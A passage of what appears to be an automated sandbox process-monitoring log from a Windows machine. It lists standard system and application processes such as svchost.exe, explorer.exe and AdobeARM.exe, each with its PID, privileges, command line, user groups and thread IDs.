SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cf1a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 549 os_tid = 0x320 Thread: id = 550 os_tid = 0x324 Thread: id = 552 os_tid = 0x32c Thread: id = 555 os_tid = 0x338 Thread: id = 556 os_tid = 0x33c Thread: id = 559 os_tid = 0x34c Thread: id = 560 os_tid = 0x350 Thread: id = 561 os_tid = 0x354 Thread: id = 563 os_tid = 0x35c Thread: id = 565 os_tid = 0x364 Thread: id = 578 os_tid = 0x39c Thread: id = 583 os_tid = 0x3b0 Thread: id = 586 os_tid = 0x3c0 Thread: id = 587 os_tid = 0x3c4 Thread: id = 588 os_tid = 0x3c8 Thread: id = 594 os_tid = 0x3e4 Thread: id = 602 os_tid = 0xfc Thread: id = 603 os_tid = 0xf8 Thread: id = 611 os_tid = 0x130 Thread: id = 612 os_tid = 0x134 Thread: id = 640 os_tid = 0x404 Thread: id = 642 os_tid = 0x40c Process: id = "44" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1570c000" os_pid = "0x344" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d231" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 558 os_tid = 0x348 Thread: id = 562 os_tid = 0x358 Thread: id = 564 os_tid = 0x360 Thread: id = 566 os_tid = 0x368 Thread: id = 567 os_tid = 0x36c Thread: id = 568 os_tid = 0x370 Thread: id = 581 os_tid = 0x3a8 Thread: id = 582 os_tid = 0x3ac Thread: id = 585 os_tid = 0x3bc Thread: id = 590 os_tid = 0x3d4 Thread: id = 592 os_tid = 0x3dc Thread: id = 593 os_tid = 0x3e0 Thread: id = 610 os_tid = 0xf0 Thread: id = 614 os_tid = 0x12c Thread: id = 635 os_tid = 0xf0 Thread: id = 644 os_tid = 0x414 Thread: id = 645 os_tid = 0x418 Thread: id = 648 os_tid = 0x428 Thread: id = 650 os_tid = 0x434 Thread: id = 652 os_tid = 0x440 Thread: id = 653 os_tid = 0x444 Thread: id = 654 os_tid = 0x168 Thread: id = 660 os_tid = 0x138 Thread: id = 666 os_tid = 0x478 Process: id = "45" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0xaeb3000" os_pid = "0x384" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0x29c" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2e4" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba3f" [0xc000000f], "LOCAL" [0x7] Thread: id = 573 os_tid = 0x388 Thread: id = 574 os_tid = 0x38c Thread: id = 577 os_tid = 0x398 Thread: id = 579 os_tid = 0x3a0 Thread: id = 580 os_tid = 0x3a4 Thread: id = 745 os_tid = 0x5c4 Thread: id = 751 os_tid = 0x5e0 Process: id = "46" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5f1b000" os_pid = "0x3cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000df9b" [0xc000000f], "LOCAL" [0x7] Thread: id = 589 os_tid = 0x3d0 Thread: id = 591 os_tid = 0x3d8 Thread: id = 595 os_tid = 0x3e8 Thread: id = 596 os_tid = 0x3ec Thread: id = 597 os_tid = 0x3f0 Thread: id = 604 os_tid = 0x100 Thread: id = 609 os_tid = 0x108 Thread: id = 618 os_tid = 0x150 Process: id = "47" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x3f05000" os_pid = "0x120" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x228" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d231" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 616 os_tid = 0x13c Thread: id = 617 os_tid = 0x154 Thread: id = 620 os_tid = 0x1bc Thread: id = 621 os_tid = 0x1fc Thread: id = 622 os_tid = 0x200 Thread: id = 623 os_tid = 0x1f8 Thread: id = 624 os_tid = 0x238 Process: id = "48" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3f30000" os_pid = "0x284" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f0ea" [0xc000000f], "LOCAL" [0x7] Thread: id = 626 os_tid = 0x2d0 Thread: id = 627 os_tid = 0x33c Thread: id = 629 os_tid = 0x378 Thread: id = 630 os_tid = 0x37c Thread: id = 631 os_tid = 0x3a8 Thread: id = 633 os_tid = 0x10c Thread: id = 637 os_tid = 0x130 Thread: id = 638 os_tid = 0x150 Thread: id = 639 os_tid = 0x238 Thread: id = 641 os_tid = 0x408 Thread: id = 643 os_tid = 0x410 Thread: id = 668 os_tid = 0x484 Process: id = "49" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0xf33000" os_pid = "0x41c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x17c" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 646 os_tid = 0x420 Process: id = "50" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x34fd000" os_pid = "0x42c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x31c" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 649 os_tid = 0x430 Thread: id = 656 os_tid = 0x458 Thread: id = 658 os_tid = 0x45c Thread: id = 659 os_tid = 0x468 Thread: id = 662 os_tid = 0x46c Thread: id = 753 os_tid = 0x5ec Thread: id = 754 os_tid = 0x5f0 Process: id = "51" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7a924000" os_pid = "0x438" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x41c" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 651 os_tid = 0x43c Thread: id = 657 os_tid = 0x454 Thread: id = 663 os_tid = 0x470 Thread: id = 677 os_tid = 0x4ac Thread: id = 680 os_tid = 0x4b8 Thread: id = 681 os_tid = 0x4bc Thread: id = 684 os_tid = 0x4c4 Thread: id = 686 os_tid = 0x4c8 Thread: id = 687 os_tid = 0x4d0 Thread: id = 700 os_tid = 0x504 Thread: id = 701 os_tid = 0x508 Thread: id = 703 os_tid = 0x50c Thread: id = 704 os_tid = 0x510 Thread: id = 705 os_tid = 0x514 Thread: id = 706 os_tid = 0x518 Thread: id = 707 os_tid = 0x51c Thread: id = 708 os_tid = 0x520 Thread: id = 709 os_tid = 0x528 Thread: id = 710 os_tid = 0x52c Thread: id = 711 os_tid = 0x540 Thread: id = 712 os_tid = 0x544 Thread: id = 717 os_tid = 0x554 Thread: id = 718 os_tid = 0x558 Thread: id = 719 os_tid = 0x55c Thread: id = 722 os_tid = 0x560 Thread: id = 727 os_tid = 0x578 Thread: id = 729 os_tid = 0x584 Thread: id = 733 os_tid = 0x598 Process: id = "52" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0xc44000" os_pid = "0x460" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010af5" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 661 os_tid = 0x464 Thread: id = 667 os_tid = 0x47c Thread: id = 669 os_tid = 0x488 Thread: id = 670 os_tid = 0x48c Thread: id = 674 os_tid = 0x498 Thread: id = 683 os_tid = 0x4b4 Process: id = "53" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x7a718000" os_pid = "0x49c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 676 os_tid = 0x4a0 Thread: id = 685 os_tid = 0x4c0 Thread: id = 688 os_tid = 0x4cc Thread: id = 691 os_tid = 0x4e0 Thread: id = 692 os_tid = 0x4e4 Thread: id = 693 os_tid = 0x4e8 Thread: id = 695 os_tid = 0x4f0 Thread: id = 697 os_tid = 0x4f8 Thread: id = 713 os_tid = 0x524 Thread: id = 720 os_tid = 0x54c Thread: id = 721 os_tid = 0x550 Thread: id = 723 os_tid = 0x564 Thread: id = 724 os_tid = 0x568 Thread: id = 732 os_tid = 0x590 Process: id = "54" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7aeaf000" os_pid = "0x4d4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00011c42" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 689 os_tid = 0x4d8 Thread: id = 694 os_tid = 0x4ec Thread: id = 696 os_tid = 0x4f4 Thread: id = 698 os_tid = 0x4fc Thread: id = 699 os_tid = 0x500 Thread: id = 716 os_tid = 0x548 Thread: id = 730 os_tid = 0x588 Thread: id = 746 os_tid = 0x5c8 Thread: id = 747 os_tid = 0x5cc Thread: id = 748 os_tid = 0x5d0 Thread: id = 755 os_tid = 0x5f4 Process: id = "55" image_name = "bcssync.exe" filename = "c:\\program files\\microsoft office\\office14\\bcssync.exe" page_root = "0x7a065000" os_pid = "0x530" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x438" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe\" /DelayServices" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 714 os_tid = 0x534 Process: id = "56" image_name = "runonce.exe" filename = "c:\\windows\\syswow64\\runonce.exe" page_root = "0x78f6f000" os_pid = "0x538" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x438" cmd_line = "C:\\Windows\\SysWOW64\\runonce.exe /Run6432" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 715 os_tid = 0x53c Thread: id = 725 os_tid = 0x56c Thread: id = 731 os_tid = 0x58c Thread: id = 735 os_tid = 0x59c Thread: id = 736 os_tid = 0x5a0 Process: id = "57" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x73c6e000" os_pid = "0x57c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x228" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 728 os_tid = 0x580 Thread: id = 734 os_tid = 0x594 Thread: id = 737 os_tid = 0x5a4 Thread: id = 740 os_tid = 0x5b0 Thread: id = 741 os_tid = 0x5b4 Thread: id = 742 os_tid = 0x5b8 Thread: id = 743 os_tid = 0x5bc Process: id = "58" image_name = "reader_sl.exe" filename = "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe" page_root = "0x75693000" os_pid = "0x5d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x538" cmd_line = "\"C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 750 os_tid = 0x5dc Process: id = "59" image_name = "adobearm.exe" filename = "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe" page_root = "0x73628000" os_pid = "0x5e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "56" os_parent_pid = "0x538" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e710" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 752 os_tid = 0x5e8